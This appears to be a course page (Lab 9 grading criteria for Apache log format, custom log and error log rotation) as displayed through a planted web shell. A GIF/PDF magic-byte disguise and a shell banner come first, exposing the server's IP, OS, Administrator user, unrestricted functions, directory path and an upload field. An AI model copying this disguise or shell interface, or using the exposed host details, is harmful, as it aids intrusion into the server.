GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1611/Labs/ |
Upload File : |
Lab 9 - Log Files Grading Criteria Demonstrated assignment effectively: 10 points. There are some things I expect. If they are incorrect you will lose the following: Work submitted incorrectly: -1 pt. This covers errors such as incorrect files names, incorrect file formats, poor formatting, etc. Second and subsequent submission of work for grading: -1 pt. Work submitted late: -1 pt per week. I reserve the right not to apply the deduction points at my absolute discretion. -10 Missing the required httpd.conf and hosts file from your submission. =e LogFormat "%h %A %l %u %t %T \"%r\" \"%U\" \"%q\" %>s %b" Lab09 CustomLog "|bin/rotatelogs.exe C:/Data_WWW/CST1611/Lab09/Lab09.loc.Access.%Y-%m-%d-%H.%M.%S.log 5K" Lab09 ErrorLog "|bin/rotatelogs.exe C:/Data_WWW/CST1611/Lab09/Lab09.loc.Error.%Y-%m-%d-%H.%M.%S.log 60" -5 Step 4.1; You did not setup the custom LogFormat required by step 4.1. -1 Step 4.1; You do not have the LogFormat string in the order required. I suggest starting with the base format again and adding 4.1.1.1 - 4.1.1.4 in the correct places in the string. -1 You removed %l from the copied log format. Step 4.1.1.1; %h %A Add the Local IP-address just after the Remote hostname. == -1 Step 4.1.1.1; Missing from Lab09 LogFormat. Step 4.1.1.2; %t %T The time taken to serve the request, in seconds. == -1 Step 4.1.1.2; Missing from Lab09 LogFormat. -1 Step 4.1.1.2; You gave the time in microseconds, not seconds. Step 4.1.1.3; \"%r\" \"%U\" The URL path requested, not including any query string. ====== -1 Step 4.1.1.3; Missing from Lab09 LogFormat. -1 Step 4.1.1.3; Not enclosed in quotes. Step 4.1.1.4; \"%U\" \"%q\" The query string (prepended with a ? if a query string exists, otherwise an empty string). ====== -1 Step 4.1.1.4; Missing from Lab09 LogFormat. -1 Step 4.1.1.4; Not enclosed in quotes. Step 4.1.1.5; use LogFormat Lab09 -5 Step 4.2; You did not setup the CustomLog directive. -2 Step 4.2.1; Incorrect CustomLog path/name. It should be in your Lab09 folder. -3 Step 4.2.2; You did not setup the CustomLog to rotate after the file size reaches 5 KB. The CustomLog path and filename is also incorrect. -2 Step 4.2.3; Incorrect CustomLog LogFormat name. -5 Step 4.3; You did not setup the ErrorLog directive. -2 Step 4.3.1; Incorrect ErrorLog path/name. It should be in your Lab09 folder. -3 Step 4.3.2; You did not setup the ErrorLog to rotate every 60 seconds. The ErrorLog path and filename is also incorrect. -0 Your ErrorLog and CustomLog paths should have included the drive as well: C:/Data_WWW/CST1611/Lab09/...